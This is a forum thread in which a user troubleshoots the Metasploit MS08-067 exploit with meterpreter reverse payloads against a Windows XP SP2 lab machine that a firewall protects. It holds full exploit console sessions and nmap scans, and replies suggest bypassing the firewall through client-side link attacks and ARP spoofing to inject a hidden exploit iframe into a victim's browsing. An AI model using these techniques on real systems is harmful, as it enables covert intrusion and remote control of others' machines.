pierre Posted April 12, 2016 Share Posted April 12, 2016 Hello, I am actually working on this exploit.It works well when XP firewall is turn off. Unfortunately, when I turn it on, exploit doesn't work anymore. Topology : Procedure : msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.0.3RHOST => 192.168.0.3msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set LHOST 192.168.0.1LHOST => 192.168.0.1msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability.msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.0.1:4444[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. Have you got any clue to bypass windows firewall ?! Quote Link to comment Share on other sites More sharing options...
ale Posted April 13, 2016 Share Posted April 13, 2016 Try using the reverse_https payload instead of tcp. see if that works while the firewall is enabled. btw which ms xp version are you testing against? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 13, 2016 Share Posted April 13, 2016 I think the fire wall blocks income port 445. Exploit fails. Quote Link to comment Share on other sites More sharing options...
pierre Posted April 13, 2016 Author Share Posted April 13, 2016 Try using the reverse_https payload instead of tcp. see if that works while the firewall is enabled. btw which ms xp version are you testing against? I try both http and https payload, no results msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability. msf exploit(ms08_067_netapi) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:8443/ [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability. msf exploit(ms08_067_netapi) > exploit [*] Started HTTP reverse handler on http://0.0.0.0:8080/ [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. I try to exploit a Windows XP SP2 I think the fire wall blocks income port 445. Exploit fails. Yes but because the destination port is 80 with http payload, I thought it wouldn't block anymore.. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 13, 2016 Share Posted April 13, 2016 (edited) With the firewall turned on. Run a nmap port scan on 445 Metasploit says the connection timed out on port 445 Edited April 13, 2016 by i8igmac Quote Link to comment Share on other sites More sharing options...
pierre Posted April 14, 2016 Author Share Posted April 14, 2016 root@osboxes:~# ping 192.168.0.3PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data.^C--- 192.168.0.3 ping statistics ---3 packets transmitted, 0 received, 100% packet loss, time 2016msroot@osboxes:~# nmap -p 445 192.168.0.3Starting Nmap 7.01 ( https://nmap.org) at 2016-04-14 11:17 EDT Nmap scan report for 192.168.0.3Host is up (0.00048s latency).PORT STATE SERVICE445/tcp filtered microsoft-dsMAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds Firewall is well-activated so port 445 is filtered, and doesn't respond to connection attemps, so metasploit fails, right ? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 14, 2016 Share Posted April 14, 2016 Looks about right... this fire wall wont let connections in BUT outbound trafic is allowed, you can exploit this with a crafted web link. You should look into client side attacks for port 445... metasploit will launch a webserver hosting exploit code, when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse_shell of some kind. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 14, 2016 Share Posted April 14, 2016 (edited) https://blog.g0tmi1k.com/2011/01/owning-windows-xp-sp2-vs/ client side attacks... try this tutorial Edited April 14, 2016 by i8igmac Quote Link to comment Share on other sites More sharing options...
pierre Posted April 20, 2016 Author Share Posted April 20, 2016 Looks about right... this fire wall wont let connections in BUT outbound trafic is allowed, you can exploit this with a crafted web link. You should look into client side attacks for port 445... metasploit will launch a webserver hosting exploit code, when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse_shell of some kind. Hmm so previously client has to be social-engineering Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 20, 2016 Share Posted April 20, 2016 Not exactly social engineer, you can arp spoof and inject a iframe src=metasploit.link exploit It can happen in the background when the client is web surfing. Quote Link to comment Share on other sites More sharing options...
pierre Posted April 21, 2016 Author Share Posted April 21, 2016 Thakns I'll have a look at the tuto :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.